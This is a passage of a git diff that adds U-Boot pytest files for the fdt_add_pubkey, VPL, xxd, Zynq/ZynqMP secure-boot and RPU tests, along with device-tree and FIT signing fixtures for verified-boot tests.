'-pss', '-E -p 0x10000', False], + ['sha256-pss-required', 'sha256', '-pss', None, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha384-basic', 'sha384', '', None, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', True], + ['sha256-global-sign', 'sha256', '', '', False], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,algo_arg", TESTDATA) +def test_fdt_add_pubkey(u_boot_console, name, sha_algo, padding, sign_options, algo_arg): + """Test fdt_add_pubkey utility with bunch of different algo options.""" + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def test_add_pubkey(sha_algo, padding, sign_options): + """Test fdt_add_pubkey utility with given hash algorithm and padding. + + This function tests if fdt_add_pubkey utility may add public keys into dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test fdt_add_pubkey with signed configuration' % sha_algo) + # Then add the dev key via the fdt_add_pubkey tool + util.run_and_log(cons, [fdt_add_pubkey, '-a', '%s,%s' % ('sha256' if algo_arg else sha_algo, \ + 'rsa3072' if sha_algo == 'sha384' else 'rsa2048'), + '-k', tmpdir, '-n', 'dev', '-r', 'conf', dtb]) + + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + + # Check with fit_check_sign that FIT is signed with key + util.run_and_log(cons, [fit_check_sign, '-f', fit, '-k', dtb]) + + cons = u_boot_console + tmpdir = os.path.join(cons.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = cons.config.build_dir + '/tools/mkimage' + binman = cons.config.source_dir + '/tools/binman/binman' + fit_check_sign = cons.config.build_dir + '/tools/fit_check_sign' + fdt_add_pubkey = cons.config.build_dir + '/tools/fdt_add_pubkey' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + + # keys created in test_vboot test + + test_add_pubkey(sha_algo, padding, sign_options) diff --git a/test/py/tests/test_vpl.py b/test/py/tests/test_vpl.py new file mode 100644 index 00000000000..4af578b9173 --- /dev/null +++ b/test/py/tests/test_vpl.py @@ -0,0 +1,34 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +def test_vpl(u_boot_console, ut_vpl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + vpl/u-boot-vpl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): VPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + cons = u_boot_console + cons.restart_uboot_with_flags(['-u', '-k', ut_vpl_subtest.split()[1]]) + output = cons.get_spawn_output().replace('\r', '') + assert 'Failures: 0' in output + finally: + # Restart afterward in case a non-VPL test is run next. This should not + # happen since VPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_xxd/conftest.py b/test/py/tests/test_xxd/conftest.py new file mode 100644 index 00000000000..47c7cce1aa9 --- /dev/null +++ b/test/py/tests/test_xxd/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for xxd command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def xxd_data(u_boot_config): + """Set up a file system to be used in xxd tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_xxd' + image_path = u_boot_config.persistent_data_dir + '/xxd.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n\x00\x01\x02\x03\x04\x05') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_xxd/test_xxd.py b/test/py/tests/test_xxd/test_xxd.py new file mode 100644 index 00000000000..06b9cfc0003 --- /dev/null +++ b/test/py/tests/test_xxd/test_xxd.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for xxd command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_xxd') +def test_xxd(u_boot_console, xxd_data): + """ Unit test for xxd + + Args: + u_boot_console -- U-Boot console + xxd_data -- Path to the disk image used for testing. + """ + response = u_boot_console.run_command_list([ + f'host bind 0 {xxd_data}', + 'xxd host 0 hello']) + + assert '00000000: 68 65 6c 6c 6f 20 77 6f 72 6c 64 0a 00 01 02 03 hello world.....\r\r\n' + \ + '00000010: 04 05 ..' \ + in response diff --git a/test/py/tests/test_zynq_secure.py b/test/py/tests/test_zynq_secure.py new file mode 100644 index 00000000000..0ee5aebc484 --- /dev/null +++ b/test/py/tests/test_zynq_secure.py @@ -0,0 +1,190 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import u_boot_utils +import test_net + +""" +This test verifies different type of secure boot images to authentication and +decryption using AES and RSA features for AMD's Zynq SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. It also relies on dhcp or setup_static net test +to support tftp to load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server and addresses +# and size for aes and rsa cases respectively. This variable may be omitted or +# set to None if zynqmp secure testing is not possible or desired. +env__zynq_aes_readable_file = { + 'fn': 'zynq_aes_image.bin', + 'fnbit': 'zynq_aes_bit.bin', + 'fnpbit': 'zynq_aes_par_bit.bin', + 'srcaddr': 0x1000000, + 'dstaddr': 0x2000000, + 'dstlen': 0x1000000, +} + +env__zynq_rsa_readable_file = { + 'fn': 'zynq_rsa_image.bin', + 'fninvalid': 'zynq_rsa_image_invalid.bin', + 'srcaddr': 0x1000000, +} +""" + +def zynq_secure_pre_commands(u_boot_console): + output = u_boot_console.run_command('print modeboot') + if not 'modeboot=' in output: + pytest.skip('bootmode cannnot be determined') + m = re.search('modeboot=(.+?)boot', output) + if not m: + pytest.skip('bootmode cannnot be determined') + bootmode = m.group(1) + if bootmode == 'jtag': + pytest.skip('skipping due to jtag bootmode') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_image(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + dstaddr = f.get('dstaddr', None) + if not dstaddr: + pytest.skip('No dstaddr specified in env file to read') + + dstsize = f.get('dstlen', None) + if not dstsize: + pytest.skip('No dstlen specified in env file to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command( + 'zynq aes %x $filesize %x %x' % (srcaddr, dstaddr, dstsize) + ) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_bitstream(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnbit'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command( + 'zynq aes load %x $filesize' % (srcaddr) + ) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_partial_bitstream(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnpbit'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command('zynq aes loadp %x $filesize' % (srcaddr)) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = u_boot_console.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image_invalid(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fninvalid = f['fninvalid'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fninvalid)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = u_boot_console.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op in output + output = u_boot_console.run_command('echo $?') + assert not output.endswith('0') diff --git a/test/py/tests/test_zynqmp_rpu.py b/test/py/tests/test_zynqmp_rpu.py new file mode 100644 index 00000000000..479a612b4ec --- /dev/null +++ b/test/py/tests/test_zynqmp_rpu.py @@ -0,0 +1,208 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import string +import test_net + +""" +Note: This test relies on boardenv_* containing configuration values to define +RPU applications information for AMD's ZynqMP SoC which contains, application +names, processors, address where it is built, expected output and the tftp load +addresses. This test will be automatically skipped without this. + +It also relies on dhcp or setup_static net test to support tftp to load +application on DDR. All the environment parameters are stored sequentially. +The length of all parameters values should be same. For example, if 2 app_names +are defined in a list as a value of parameter 'app_name' then the other +parameters value also should have a list with 2 items. +It will run RPU cases for all the applications defined in boardenv_* +configuration file. + +Example: +env__zynqmp_rpu_apps = { + 'app_name': ['hello_world_r5_0_ddr.elf', 'hello_world_r5_1_ddr.elf'], + 'proc': ['rpu0', 'rpu1'], + 'cpu_num': [4, 5], + 'addr': [0xA00000, 0xB00000], + 'output': ['Successfully ran Hello World application on DDR from RPU0', + 'Successfully ran Hello World application on DDR from RPU1'], + 'tftp_addr': [0x100000, 0x200000], +} +""" + +# Get rpu apps params from env +def get_rpu_apps_env(u_boot_console): + rpu_apps = u_boot_console.config.env.get('env__zynqmp_rpu_apps', False) + if not rpu_apps: + pytest.skip('ZynqMP RPU application info not defined!') + + apps = rpu_apps.get('app_name', None) + if not apps: + pytest.skip('No RPU application found!') + + procs = rpu_apps.get('proc', None) + if not procs: + pytest.skip('No RPU application processor provided!') + + cpu_nums = rpu_apps.get('cpu_num', None) + if not cpu_nums: + pytest.skip('No CPU number for respective processor provided!') + + addrs = rpu_apps.get('addr', None) + if not addrs: + pytest.skip('No RPU application build address found!') + + outputs = rpu_apps.get('output', None) + if not outputs: + pytest.skip('Expected output not found!') + + tftp_addrs = rpu_apps.get('tftp_addr', None) + if not tftp_addrs: + pytest.skip('TFTP address to load application not found!') + + return apps, procs, cpu_nums, addrs, outputs, tftp_addrs + +# Check return code +def ret_code(u_boot_console): + return u_boot_console.run_command('echo $?') + +# Initialize tcm +def tcminit(u_boot_console, rpu_mode): + output = u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert 'Initializing TCM overwrites TCM content' in output + return ret_code(u_boot_console) + +# Load application in DDR +def load_app_ddr(u_boot_console, tftp_addr, app): + output = u_boot_console.run_command('tftpboot %x %s' % (tftp_addr, app)) + assert 'TIMEOUT' not in output + assert 'Bytes transferred = ' in output + + # Load elf + u_boot_console.run_command('bootelf -p %x' % tftp_addr) + assert ret_code(u_boot_console).endswith('0') + +# Disable cpus +def disable_cpus(u_boot_console, cpu_nums): + for num in cpu_nums: + u_boot_console.run_command(f'cpu {num} disable') + +# Load apps on RPU cores +def rpu_apps_load(u_boot_console, rpu_mode): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + try: + assert tcminit(u_boot_console, rpu_mode).endswith('0') + + for i in range(len(apps)): + if rpu_mode == 'lockstep' and procs[i] != 'rpu0': + continue + + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + rel_addr = int(addrs[i] + 0x3C) + + # Release cpu at app load address + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + u_boot_console.wait_for(outputs[i]) + assert ret_code(u_boot_console).endswith('0') + finally: + disable_cpus(u_boot_console, cpu_nums) + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_split(u_boot_console): + rpu_apps_load(u_boot_console, 'split') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_lockstep(u_boot_console): + rpu_apps_load(u_boot_console, 'lockstep') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_negative(u_boot_console): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + u_boot_console) + + # Invalid commands + u_boot_console.run_command('zynqmp tcminit mode') + assert ret_code(u_boot_console).endswith('1') + + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + u_boot_console.run_command('zynqmp tcminit %s' % rand_str) + assert ret_code(u_boot_console).endswith('1') + + rand_num = random.randint(2, 100) + u_boot_console.run_command('zynqmp tcminit %d' % rand_num) + assert ret_code(u_boot_console).endswith('1') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + try: + rpu_mode = 'split' + assert tcminit(u_boot_console, rpu_mode).endswith('0') + + for i in range(len(apps)): + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + + # Run in split mode at different load address + rel_addr = int(addrs[i]) + random.randint(200, 1000) + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert not outputs[i] in output + + # Invalid rpu mode + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rand_str) + output = u_boot_console.run_command(cmd) + assert exp_op in output + assert f'Unsupported mode' in output + assert not ret_code(u_boot_console).endswith('0') + + # Switch to lockstep mode, without disabling CPUs + rpu_mode = 'lockstep' + u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert not ret_code(u_boot_console).endswith('0') + + # Disable cpus + disable_cpus(u_boot_console, cpu_nums) + + # Switch to lockstep mode, after disabling CPUs + output = u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert 'Initializing TCM overwrites TCM content' in output + assert ret_code(u_boot_console).endswith('0') + + # Run lockstep mode for RPU1 + for i in range(len(apps)): + if procs[i] == 'rpu0': + continue + + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + rel_addr = int(addrs[i] + 0x3C) + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert u_boot_console.p.expect([outputs[i]]) + finally: + disable_cpus(u_boot_console, cpu_nums) + # This forces the console object to be shutdown, so any subsequent test + # will reset the board back into U-Boot. + u_boot_console.drain_console() + u_boot_console.cleanup_spawn() diff --git a/test/py/tests/test_zynqmp_secure.py b/test/py/tests/test_zynqmp_secure.py new file mode 100644 index 00000000000..570bd2439c1 --- /dev/null +++ b/test/py/tests/test_zynqmp_secure.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import u_boot_utils +import test_net + +""" +This test verifies different type of secure boot images loaded at the DDR for +AMD's ZynqMP SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the files to be used for testing. Without this, this test will be automatically +skipped. It also relies on dhcp or setup_static net test to support tftp to +load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server. This +# variable may be omitted or set to None if zynqmp secure testing is not +# possible or desired. +env__zynqmp_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'aes.txt', +} +""" + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_image(u_boot_console): + """This test verifies secure boot image at the DDR address for + authentication only case. + """ + + f = u_boot_console.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = u_boot_console.run_command('zynqmp secure %x $filesize' % (addr)) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output + + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_img_kup(u_boot_console): + """This test verifies secure boot image at the DDR address for encryption + with kup key case. + """ + + f = u_boot_console.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = u_boot_console.run_command( + 'zynqmp secure %x $filesize %x' % (addr, keyaddr) + ) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output diff --git a/test/py/tests/vboot/hash-images.its b/test/py/tests/vboot/hash-images.its new file mode 100644 index 00000000000..3ff797288c2 --- /dev/null +++ b/test/py/tests/vboot/hash-images.its @@ -0,0 +1,76 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman-pss.dts b/test/py/tests/vboot/sandbox-binman-pss.dts new file mode 100644 index 00000000000..56e3a42fa6f --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman-pss.dts @@ -0,0 +1,25 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman.dts b/test/py/tests/vboot/sandbox-binman.dts new file mode 100644 index 00000000000..b24aeba0fa8 --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-kernel.dts b/test/py/tests/vboot/sandbox-kernel.dts new file mode 100644 index 00000000000..a1e853c9caa --- /dev/null +++ b/test/py/tests/vboot/sandbox-kernel.dts @@ -0,0 +1,7 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global-pss.dts b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts new file mode 100644 index 00000000000..c59a68221b9 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts @@ -0,0 +1,28 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global.dts b/test/py/tests/vboot/sandbox-u-boot-global.dts new file mode 100644 index 00000000000..1409f9e1a10 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global.dts @@ -0,0 +1,27 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot.dts b/test/py/tests/vboot/sandbox-u-boot.dts new file mode 100644 index 00000000000..5809c62fc1c --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot.dts @@ -0,0 +1,13 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-algo-arg.its b/test/py/tests/vboot/sign-configs-algo-arg.its new file mode 100644 index 00000000000..3a5bb6d0f73 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-algo-arg.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1-pss.its b/test/py/tests/vboot/sign-configs-sha1-pss.its new file mode 100644 index 00000000000..72a5637e3a1 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1.its b/test/py/tests/vboot/sign-configs-sha1.its new file mode 100644 index 00000000000..d8bc1fa0919 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + 